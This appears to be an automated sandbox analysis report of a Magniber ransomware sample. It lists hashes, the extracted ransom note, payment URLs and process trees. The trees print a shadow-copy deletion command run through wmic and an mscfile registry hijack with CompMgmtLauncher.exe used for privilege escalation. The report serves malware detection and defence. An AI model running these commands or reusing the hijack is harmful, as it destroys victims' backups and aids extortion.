magniber | b8509f34589fa23a5d2db7d84b70a351f8bf928a789b45f0f10168b48319ecb9

Analysis

max time kernel
147s
max time network
140s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
06-12-2024 04:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118.dll
Size

20KB
MD5

cb0261d9a3e77ffecdb51914b3690f18
SHA1

9f2604c82b06cc7b74f354afa8daebec9e66fb83
SHA256

b8509f34589fa23a5d2db7d84b70a351f8bf928a789b45f0f10168b48319ecb9
SHA512

8ad0761d452013f47a1805360057dec90c1016c76c80781e8420a4f29824687b0b396031521192d291055f125c96a87100cbe931d682b40e6e9edcb6acd39364
SSDEEP

384:JV0mpLDSVriGcs3QhglYdOKgnoRoeo//HRpADW8qw4yyydir9r/WX7BBunmoFYfY:JyWLWVriGu6Yw7noRK/HRpADV4yysi5e

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://34c06a48a400dc40fcuahnpdvb.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/uahnpdvb Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://34c06a48a400dc40fcuahnpdvb.iecard.top/uahnpdvb http://34c06a48a400dc40fcuahnpdvb.topsaid.site/uahnpdvb http://34c06a48a400dc40fcuahnpdvb.ourunit.xyz/uahnpdvb http://34c06a48a400dc40fcuahnpdvb.gosmark.space/uahnpdvb Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://34c06a48a400dc40fcuahnpdvb.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/uahnpdvb

http://34c06a48a400dc40fcuahnpdvb.iecard.top/uahnpdvb

http://34c06a48a400dc40fcuahnpdvb.topsaid.site/uahnpdvb

http://34c06a48a400dc40fcuahnpdvb.ourunit.xyz/uahnpdvb

http://34c06a48a400dc40fcuahnpdvb.gosmark.space/uahnpdvb

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral1/memory/2000-0-0x0000000001E40000-0x00000000024BC000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Magniber family
magniber

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2892	1564	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2636	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	1564	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1540	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	220	1564	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2984	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2832	1564	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	784	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	580	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1700	1564	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2784	1564	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2856	1564	vssadmin.exe	40

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (83) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Drops desktop.ini file(s) 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L2BFB2JG\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MYC3PENY\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9C9T5AL\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROVWYKHE\desktop.ini	DllHost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2000 set thread context of 1124	2000	rundll32.exe	19
PID 2000 set thread context of 1176	2000	rundll32.exe	20
PID 2000 set thread context of 1272	2000	rundll32.exe	21
PID 2000 set thread context of 1228	2000	rundll32.exe	23

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Interacts with shadow copies 3 TTPs 10 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2784	vssadmin.exe
2856	vssadmin.exe
1576	vssadmin.exe
1144	vssadmin.exe
1540	vssadmin.exe
784	vssadmin.exe
580	vssadmin.exe
2636	vssadmin.exe
232	vssadmin.exe
2984	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9010aa6d9647db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439620768"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{974120B1-B389-11EF-98DB-E29800E22076} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002aa6f01a5c1dec4887259b29e600834400000000020000000000106600000001000020000000a9286878baf07c76c16d0c68eb011e8ce771ca7a2a86e19602269d5b8fc9d16b000000000e8000000002000020000000bae38a9e534b728992c3902a3553cd0e853427c9e6aa66823cd9e94a4832a9cb90000000b7add1088e1f1bedd8106a7e4f37fbe4738114b2c9c244f082a47fee6ee661630de8a6c0d72c32ce1df9b256f21ec59dcd5da68afc94ad25f202f698acf7dc3f7c3129bbc22c7176d0c56e1cc8962bb05e8cef39994b74d7037a46867c5ac5b063414c3a025dad27c4d6b4ac5ceb669cf6c55fde609910b4b2eaca9b5d4bd2966068acba8e3caac9c253a73c5130f5054000000006404a1f84072e88a0f6dbc4afeeb9f56f47289ec4bd9cf6a85795b72c422da02997808a20ce6037b1c9831330cec26a807dee334279738736379c3f9a1253ad	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002aa6f01a5c1dec4887259b29e600834400000000020000000000106600000001000020000000caabd442e08e7a423e9f5a0662a88cc5a73aeec7ce3e757ce4806c83eeb5993d000000000e80000000020000200000009a347bf2f3967c8d28a7094423e36992baf0311bc8680e6d49748e4fd89007e82000000097be3dcc74b283f9a3a15604308a78e4183c00dd675d5b470f6d2739effeab8d4000000026e05953be2f6308720945ab2ae3f05da1eb50595cdba1d715e502050f5e1d7489fb0901190223fb5c7d08feba9a25b21507bbfcab0b923531bb394b691f08c0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1780	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2000	rundll32.exe
2000	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
2000	rundll32.exe
2000	rundll32.exe
2000	rundll32.exe
2000	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1880	wmic.exe
Token: SeSecurityPrivilege	1880	wmic.exe
Token: SeTakeOwnershipPrivilege	1880	wmic.exe
Token: SeLoadDriverPrivilege	1880	wmic.exe
Token: SeSystemProfilePrivilege	1880	wmic.exe
Token: SeSystemtimePrivilege	1880	wmic.exe
Token: SeProfSingleProcessPrivilege	1880	wmic.exe
Token: SeIncBasePriorityPrivilege	1880	wmic.exe
Token: SeCreatePagefilePrivilege	1880	wmic.exe
Token: SeBackupPrivilege	1880	wmic.exe
Token: SeRestorePrivilege	1880	wmic.exe
Token: SeShutdownPrivilege	1880	wmic.exe
Token: SeDebugPrivilege	1880	wmic.exe
Token: SeSystemEnvironmentPrivilege	1880	wmic.exe
Token: SeRemoteShutdownPrivilege	1880	wmic.exe
Token: SeUndockPrivilege	1880	wmic.exe
Token: SeManageVolumePrivilege	1880	wmic.exe
Token: 33	1880	wmic.exe
Token: 34	1880	wmic.exe
Token: 35	1880	wmic.exe
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1488	WMIC.exe
Token: SeSecurityPrivilege	1488	WMIC.exe
Token: SeTakeOwnershipPrivilege	1488	WMIC.exe
Token: SeLoadDriverPrivilege	1488	WMIC.exe
Token: SeSystemProfilePrivilege	1488	WMIC.exe
Token: SeSystemtimePrivilege	1488	WMIC.exe
Token: SeProfSingleProcessPrivilege	1488	WMIC.exe
Token: SeIncBasePriorityPrivilege	1488	WMIC.exe
Token: SeCreatePagefilePrivilege	1488	WMIC.exe
Token: SeBackupPrivilege	1488	WMIC.exe
Token: SeRestorePrivilege	1488	WMIC.exe
Token: SeShutdownPrivilege	1488	WMIC.exe
Token: SeDebugPrivilege	1488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1488	WMIC.exe
Token: SeRemoteShutdownPrivilege	1488	WMIC.exe
Token: SeUndockPrivilege	1488	WMIC.exe
Token: SeManageVolumePrivilege	1488	WMIC.exe
Token: 33	1488	WMIC.exe
Token: 34	1488	WMIC.exe
Token: 35	1488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1880	wmic.exe
Token: SeSecurityPrivilege	1880	wmic.exe
Token: SeTakeOwnershipPrivilege	1880	wmic.exe
Token: SeLoadDriverPrivilege	1880	wmic.exe
Token: SeSystemProfilePrivilege	1880	wmic.exe
Token: SeSystemtimePrivilege	1880	wmic.exe
Token: SeProfSingleProcessPrivilege	1880	wmic.exe
Token: SeIncBasePriorityPrivilege	1880	wmic.exe
Token: SeCreatePagefilePrivilege	1880	wmic.exe
Token: SeBackupPrivilege	1880	wmic.exe
Token: SeRestorePrivilege	1880	wmic.exe
Token: SeShutdownPrivilege	1880	wmic.exe
Token: SeDebugPrivilege	1880	wmic.exe
Token: SeSystemEnvironmentPrivilege	1880	wmic.exe
Token: SeRemoteShutdownPrivilege	1880	wmic.exe
Token: SeUndockPrivilege	1880	wmic.exe
Token: SeManageVolumePrivilege	1880	wmic.exe
Token: 33	1880	wmic.exe
Token: 34	1880	wmic.exe
Token: 35	1880	wmic.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
380	iexplore.exe
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE
1272	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
380	iexplore.exe
380	iexplore.exe
2756	IEXPLORE.EXE
2756	IEXPLORE.EXE
2756	IEXPLORE.EXE
2756	IEXPLORE.EXE

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1272	Explorer.EXE
1272	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1228 wrote to memory of 1780	1228	DllHost.exe	31
PID 1228 wrote to memory of 1780	1228	DllHost.exe	31
PID 1228 wrote to memory of 1780	1228	DllHost.exe	31
PID 1228 wrote to memory of 2368	1228	DllHost.exe	32
PID 1228 wrote to memory of 2368	1228	DllHost.exe	32
PID 1228 wrote to memory of 2368	1228	DllHost.exe	32
PID 1228 wrote to memory of 1880	1228	DllHost.exe	33
PID 1228 wrote to memory of 1880	1228	DllHost.exe	33
PID 1228 wrote to memory of 1880	1228	DllHost.exe	33
PID 1228 wrote to memory of 2516	1228	DllHost.exe	34
PID 1228 wrote to memory of 2516	1228	DllHost.exe	34
PID 1228 wrote to memory of 2516	1228	DllHost.exe	34
PID 2516 wrote to memory of 1488	2516	cmd.exe	38
PID 2516 wrote to memory of 1488	2516	cmd.exe	38
PID 2516 wrote to memory of 1488	2516	cmd.exe	38
PID 2368 wrote to memory of 380	2368	cmd.exe	39
PID 2368 wrote to memory of 380	2368	cmd.exe	39
PID 2368 wrote to memory of 380	2368	cmd.exe	39
PID 380 wrote to memory of 2756	380	iexplore.exe	41
PID 380 wrote to memory of 2756	380	iexplore.exe	41
PID 380 wrote to memory of 2756	380	iexplore.exe	41
PID 380 wrote to memory of 2756	380	iexplore.exe	41
PID 2892 wrote to memory of 2764	2892	cmd.exe	46
PID 2892 wrote to memory of 2764	2892	cmd.exe	46
PID 2892 wrote to memory of 2764	2892	cmd.exe	46
PID 2764 wrote to memory of 1072	2764	CompMgmtLauncher.exe	48
PID 2764 wrote to memory of 1072	2764	CompMgmtLauncher.exe	48
PID 2764 wrote to memory of 1072	2764	CompMgmtLauncher.exe	48
PID 1272 wrote to memory of 2472	1272	Explorer.EXE	54
PID 1272 wrote to memory of 2472	1272	Explorer.EXE	54
PID 1272 wrote to memory of 2472	1272	Explorer.EXE	54
PID 1272 wrote to memory of 1920	1272	Explorer.EXE	55
PID 1272 wrote to memory of 1920	1272	Explorer.EXE	55
PID 1272 wrote to memory of 1920	1272	Explorer.EXE	55
PID 1920 wrote to memory of 2328	1920	cmd.exe	58
PID 1920 wrote to memory of 2328	1920	cmd.exe	58
PID 1920 wrote to memory of 2328	1920	cmd.exe	58
PID 876 wrote to memory of 2572	876	cmd.exe	63
PID 876 wrote to memory of 2572	876	cmd.exe	63
PID 876 wrote to memory of 2572	876	cmd.exe	63
PID 2572 wrote to memory of 344	2572	CompMgmtLauncher.exe	64
PID 2572 wrote to memory of 344	2572	CompMgmtLauncher.exe	64
PID 2572 wrote to memory of 344	2572	CompMgmtLauncher.exe	64
PID 2000 wrote to memory of 1708	2000	rundll32.exe	68
PID 2000 wrote to memory of 1708	2000	rundll32.exe	68
PID 2000 wrote to memory of 1708	2000	rundll32.exe	68
PID 2000 wrote to memory of 1908	2000	rundll32.exe	69
PID 2000 wrote to memory of 1908	2000	rundll32.exe	69
PID 2000 wrote to memory of 1908	2000	rundll32.exe	69
PID 1908 wrote to memory of 1576	1908	cmd.exe	72
PID 1908 wrote to memory of 1576	1908	cmd.exe	72
PID 1908 wrote to memory of 1576	1908	cmd.exe	72
PID 220 wrote to memory of 2816	220	cmd.exe	77
PID 220 wrote to memory of 2816	220	cmd.exe	77
PID 220 wrote to memory of 2816	220	cmd.exe	77
PID 2816 wrote to memory of 1144	2816	CompMgmtLauncher.exe	78
PID 2816 wrote to memory of 1144	2816	CompMgmtLauncher.exe	78
PID 2816 wrote to memory of 1144	2816	CompMgmtLauncher.exe	78
PID 1124 wrote to memory of 1628	1124	taskhost.exe	82
PID 1124 wrote to memory of 1628	1124	taskhost.exe	82
PID 1124 wrote to memory of 1628	1124	taskhost.exe	82
PID 1124 wrote to memory of 1056	1124	taskhost.exe	83
PID 1124 wrote to memory of 1056	1124	taskhost.exe	83
PID 1124 wrote to memory of 1056	1124	taskhost.exe	83

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1628
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:1056
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2544

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
PID:1176
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:328
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:2576
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2188

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1272
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1708
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:1576
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2472
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops desktop.ini file(s)
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1228
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1780
- C:\Windows\system32\cmd.exe
  cmd /c "start http://34c06a48a400dc40fcuahnpdvb.iecard.top/uahnpdvb^&2^&32792626^&83^&373^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://34c06a48a400dc40fcuahnpdvb.iecard.top/uahnpdvb&2&32792626&83&373&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:380
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:380 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2756
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1880
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1488

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2892
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1072

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
